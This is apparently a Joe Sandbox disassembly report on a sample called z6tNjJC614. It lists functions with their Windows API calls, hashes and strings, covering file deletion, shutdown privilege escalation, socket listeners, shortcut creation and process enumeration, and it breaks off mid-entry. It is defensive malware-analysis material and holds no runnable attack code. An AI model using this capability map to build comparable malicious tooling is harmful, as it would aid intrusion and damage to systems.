                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: 76ebfe20fffc2341706a9d8ffe5c080b855d7a87e601652dce96b8e6b8c420ce
                                                                      • Instruction ID: 5d9d4197082ea621116cefcc20ba1ca52489c06048486a5ce2e97affab2d2abf
                                                                      • Opcode Fuzzy Hash: 76ebfe20fffc2341706a9d8ffe5c080b855d7a87e601652dce96b8e6b8c420ce
                                                                      • Instruction Fuzzy Hash: 62218035200212AFDB10AF24DC19B697FA8FF65710F118426FD46DB261DB30A845DB94
                                                                      Function 005737EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00514750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00514743,?,?,005137AE,?), ref: 00514770
                                                                        • Part of subcall function 00574A31: GetFileAttributesW.KERNEL32(?,0057370B), ref: 00574A32
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 005738A3
                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0057394B
                                                                      • MoveFileW.KERNEL32(?,?), ref: 0057395E
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0057397B
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057399D
                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 005739B9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 4002782344-1173974218
                                                                      • Opcode ID: 049a79935da6f01e2d97f3af0d82d647f0a68f594c2d04388b577739f7429d1b
                                                                      • Instruction ID: 856c37c9b136494e88de9a96cb087785964c29b9577b8012e884f672abff6919
                                                                      • Opcode Fuzzy Hash: 049a79935da6f01e2d97f3af0d82d647f0a68f594c2d04388b577739f7429d1b
                                                                      • Instruction Fuzzy Hash: 1951A03180514E9ADF01EBA4E9969EDBF78BF94310F604069F40AB6191EB306F49EB51
                                                                      Function 0057F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0057F440
                                                                      • Sleep.KERNEL32(0000000A), ref: 0057F470
                                                                      • _wcscmp.LIBCMT ref: 0057F484
                                                                      • _wcscmp.LIBCMT ref: 0057F49F
                                                                      • FindNextFileW.KERNEL32(?,?), ref: 0057F53D
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F553
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                      • String ID: *.*
                                                                      • API String ID: 713712311-438819550
                                                                      • Opcode ID: 26940e1a0f12318550142ef77e0d53cb4fc9870dc010da9cc2899f050270dacb
                                                                      • Instruction ID: 4c17ca467f14e4ed61b0570f5bba769c830148589aaf8a4af8253674155684a4
                                                                      • Opcode Fuzzy Hash: 26940e1a0f12318550142ef77e0d53cb4fc9870dc010da9cc2899f050270dacb
                                                                      • Instruction Fuzzy Hash: DC414F7190021A9FDF14DF64EC49AEEBFB4FF45314F148466E819A3191EB309E94EB90
                                                                      Function 00523030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __itow__swprintf
                                                                      • String ID: 3cR$_R
                                                                      • API String ID: 674341424-502522525
                                                                      • Opcode ID: 3cab9e84e93d8360720c6291af52d6ecaf9707deee90e6016e305f81be74990c
                                                                      • Instruction ID: 1fa1dce97e9f560593d645ccc8065f2456ec4d77e1836617cb16bdb0bca17cb8
                                                                      • Opcode Fuzzy Hash: 3cab9e84e93d8360720c6291af52d6ecaf9707deee90e6016e305f81be74990c
                                                                      • Instruction Fuzzy Hash: 5622BC716083119FDB24EF14D895BAEBBE4BFC5300F40491DF89A97291DB34EA48CB92
                                                                      Function 00525760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: f1685eaf1c174dd84898e4e05e813468f8b6e58fb0f69d7ecd28464b510ef3fd
                                                                      • Instruction ID: 1a24c796788f001113b0560f81b4741b6593208cd1a47674c8fec1e990ca0c38
                                                                      • Opcode Fuzzy Hash: f1685eaf1c174dd84898e4e05e813468f8b6e58fb0f69d7ecd28464b510ef3fd
                                                                      • Instruction Fuzzy Hash: 8F127A70A00A1ADFDF14DFA5D985AEEBBF5FF88300F104569E806A7290EB35AD54CB50
                                                                      Function 00573B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00514750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00514743,?,?,005137AE,?), ref: 00514770
                                                                        • Part of subcall function 00574A31: GetFileAttributesW.KERNEL32(?,0057370B), ref: 00574A32
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00573B89
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00573BD9
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00573BEA
                                                                      • FindClose.KERNEL32(00000000), ref: 00573C01
                                                                      • FindClose.KERNEL32(00000000), ref: 00573C0A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: aeae4af7a95eb05137045ce7a4019b2cdd353af979b69eba766a7da4fea35dae
                                                                      • Instruction ID: 050173d00b520582bc8468bdf6afc7fddc69e4eaa4a84ba3b87383e442317267
                                                                      • Opcode Fuzzy Hash: aeae4af7a95eb05137045ce7a4019b2cdd353af979b69eba766a7da4fea35dae
                                                                      • Instruction Fuzzy Hash: 973190310083869BD301EF24D8998EFBBACBE95314F444D2DF4D992191EB209A0CEB97
                                                                      Function 005751BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 005687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0056882B
                                                                        • Part of subcall function 005687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00568858
                                                                        • Part of subcall function 005687E1: GetLastError.KERNEL32 ref: 00568865
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 005751F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                      • String ID: $@$SeShutdownPrivilege
                                                                      • API String ID: 2234035333-194228
                                                                      • Opcode ID: ef597f577e8841f6f4405ee1819e8cc615f420e2f9fd54506ac6aee034710b63
                                                                      • Instruction ID: 9901392190b7b87f123a6140d0ef04c79b407e782c4167a6a7389d8d059a3c1c
                                                                      • Opcode Fuzzy Hash: ef597f577e8841f6f4405ee1819e8cc615f420e2f9fd54506ac6aee034710b63
                                                                      • Instruction Fuzzy Hash: F601FC397916115BE7285264BC4EFBA7E58F705341F618925F90FD20D3F9D21C00A690
                                                                      Function 00586283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 005862DC
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005862EB
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00586307
                                                                      • listen.WSOCK32(00000000,00000005), ref: 00586316
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00586330
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00586344
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                      • String ID:
                                                                      • API String ID: 1279440585-0
                                                                      • Opcode ID: 86f24e50ae683f3321400c881debfed238e18650b0641bb2ae14c1090a40f50a
                                                                      • Instruction ID: 7e5344b5b98583df6ee09c611b8e0d680cea40ea40dea21be9e28246b4854850
                                                                      • Opcode Fuzzy Hash: 86f24e50ae683f3321400c881debfed238e18650b0641bb2ae14c1090a40f50a
                                                                      • Instruction Fuzzy Hash: FA21F030600205AFCB10EF64C849BAEBBA8FF88320F254559EC16E7391CB30AD45DB51
                                                                      Function 00525520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00530DB6: std::exception::exception.LIBCMT ref: 00530DEC
                                                                        • Part of subcall function 00530DB6: __CxxThrowException@8.LIBCMT ref: 00530E01
                                                                      • _memmove.LIBCMT ref: 00560258
                                                                      • _memmove.LIBCMT ref: 0056036D
                                                                      • _memmove.LIBCMT ref: 00560414
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1300846289-0
                                                                      • Opcode ID: ddf0cef96eebd6d6894d4cd9aa7ef6061260ef2ec6efbf9bb30ac5879ebfcc6a
                                                                      • Instruction ID: dbf3cacf1afc8e8856ce0ee9dd21b674422f3cbee92c66fb176c086f6a488e59
                                                                      • Opcode Fuzzy Hash: ddf0cef96eebd6d6894d4cd9aa7ef6061260ef2ec6efbf9bb30ac5879ebfcc6a
                                                                      • Instruction Fuzzy Hash: 2102CE70A0021ADFDF04DF64D985AAEBFB5FF88300F148469E806DB291EB31E954CB91
                                                                      Function 00511287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 005119FA
                                                                      • GetSysColor.USER32(0000000F), ref: 00511A4E
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00511A61
                                                                        • Part of subcall function 00511290: DefDlgProcW.USER32(?,00000020,?), ref: 005112D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ColorProc$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 3744519093-0
                                                                      • Opcode ID: f02362a4cda4f93ca8f87ca7e96ee93c29e6ad6a42b8efba58732a1813587d73
                                                                      • Instruction ID: e0b563b06b51ed3f7c4ff0163d7c9af7e1b89e0e97ae1806185f071e8670a1a6
                                                                      • Opcode Fuzzy Hash: f02362a4cda4f93ca8f87ca7e96ee93c29e6ad6a42b8efba58732a1813587d73
                                                                      • Instruction Fuzzy Hash: B1A15971106D45BAFA28AB394C48DFF3E5CFF81385F24095AF602D5192DA24DD80A2FA
                                                                      Function 00586747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00587D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00587DB6
                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0058679E
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005867C7
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00586800
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0058680D
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00586821
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 99427753-0
                                                                      • Opcode ID: 8cc1a5b50c26e7bbf2a75ab5cf8c23d8050699f5e3f7131e19fb7ff855cabeff
                                                                      • Instruction ID: d42bb2986d160ac6bb01e6ddf32579d8ac3598141684b6096f25d3c06082c53d
                                                                      • Opcode Fuzzy Hash: 8cc1a5b50c26e7bbf2a75ab5cf8c23d8050699f5e3f7131e19fb7ff855cabeff
                                                                      • Instruction Fuzzy Hash: E941D475A00201AFEB10BF648C9AFBE7BE8FF85714F048458F915AB3C2CA709D418791
                                                                      Function 00595376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                      • String ID:
                                                                      • API String ID: 292994002-0
                                                                      • Opcode ID: fa5057c1582fcd94f0e198b34caacd8f2cf37ceeddd48c62fd0e84045e3a79bf
                                                                      • Instruction ID: a293a2c2db6ded7ea625a9ff1805206902ae16363a3259f049877e64b8260ded
                                                                      • Opcode Fuzzy Hash: fa5057c1582fcd94f0e198b34caacd8f2cf37ceeddd48c62fd0e84045e3a79bf
                                                                      • Instruction Fuzzy Hash: 1311B2313009116BEF225F26DC48A6A7F98FF957A1B514839F846D3241EBB09C5187A0
                                                                      Function 005680A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005680C0
                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005680CA
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005680D9
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005680E0
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005680F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: cce7b05ab56caae513692822f5efbcd66820207a91183bc5adbc651ecfb688b0
                                                                      • Instruction ID: 866658d2bdaac867ec3226288b51f76160f30722f14daf9ba46bd021dc55b986
                                                                      • Opcode Fuzzy Hash: cce7b05ab56caae513692822f5efbcd66820207a91183bc5adbc651ecfb688b0
                                                                      • Instruction Fuzzy Hash: E1F01931240204AFEB100FA5EC8DE7A3BACFF4A755B150126F945C6150CA719846EB60
                                                                      Function 0057C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 0057C432
                                                                      • CoCreateInstance.OLE32(005A2D6C,00000000,00000001,005A2BDC,?), ref: 0057C44A
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                      • CoUninitialize.OLE32 ref: 0057C6B7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                      • String ID: .lnk
                                                                      • API String ID: 2683427295-24824748
                                                                      • Opcode ID: 50e81ba80197fb3692f53ddf8dd811adb09318231275b518374daf739af583f1
                                                                      • Instruction ID: 256de32b51926a6408d0be2eb906e486dc90b20da69ac175b084a37a02d35aec
                                                                      • Opcode Fuzzy Hash: 50e81ba80197fb3692f53ddf8dd811adb09318231275b518374daf739af583f1
                                                                      • Instruction Fuzzy Hash: 31A12971104206AFE700EF64C895EABBBECFFD9354F00491DF15587192EB71AA89CB92
                                                                      Function 00514B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00514AD0), ref: 00514B45
                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00514B57
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                      • API String ID: 2574300362-192647395
                                                                      • Opcode ID: f3a656bd8e76f94a1d526d0b6cf12b73cc1687ab2cf4d84dfb8f1b1bd5b62d0b
                                                                      • Instruction ID: 37c170cea847a80afc336129d831e02a91042124c4f0c1a6649ddec70984abb0
                                                                      • Opcode Fuzzy Hash: f3a656bd8e76f94a1d526d0b6cf12b73cc1687ab2cf4d84dfb8f1b1bd5b62d0b
                                                                      • Instruction Fuzzy Hash: 5DD01274A10713CFDB209F31E818B467AE5BF15351B15883A94C5D6150D770D4C0DB54
                                                                      Function 0058EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0058EE3D
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0058EE4B
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0058EF0B
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0058EF1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
